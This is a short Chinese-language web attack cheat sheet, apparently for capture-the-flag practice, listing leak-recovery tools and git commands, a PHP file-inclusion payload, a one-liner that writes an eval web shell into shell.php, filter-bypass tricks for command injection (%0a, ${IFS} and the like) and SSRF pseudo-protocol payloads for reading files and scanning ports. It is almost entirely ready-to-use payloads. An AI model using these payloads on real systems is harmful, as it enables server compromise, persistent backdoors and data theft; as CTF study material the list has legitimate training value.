#信息泄漏

目录遍历工具:disearch
.git文件恢复工具:GitHack

1
2
3
4
5
6
7
git log
git diff --head //比较不同
git reset --head //恢复到某版本
git stash list //查看保存的工作现场列表    
git stash pop //恢复工作现场    
git stash show //显示做了哪些改动  
git stash show -p //显示第一个保存的工作现场的改动

svn泄漏/hg泄漏工具:dvcs-ripper

#文件包含

1
<?php system('ls /');?>

#命令执行

1
2
3
echo "<?php @eval(\$_POST['a']);?>" >> shell.php
分隔符被过滤-->%0a %0d
空格被过滤-->IFS$9、%09、<、>、<>、{,}、%20、${IFS}、${IFS}

#SSRF

#伪协议

1
2
3
4
5
6
file:///
dict://
sftp://
ldap://
tftp://
gopher://

file:///var/www/html/flag.php //查看源代码
dict://127.0.0.1:$port$ //结合burp扫码端口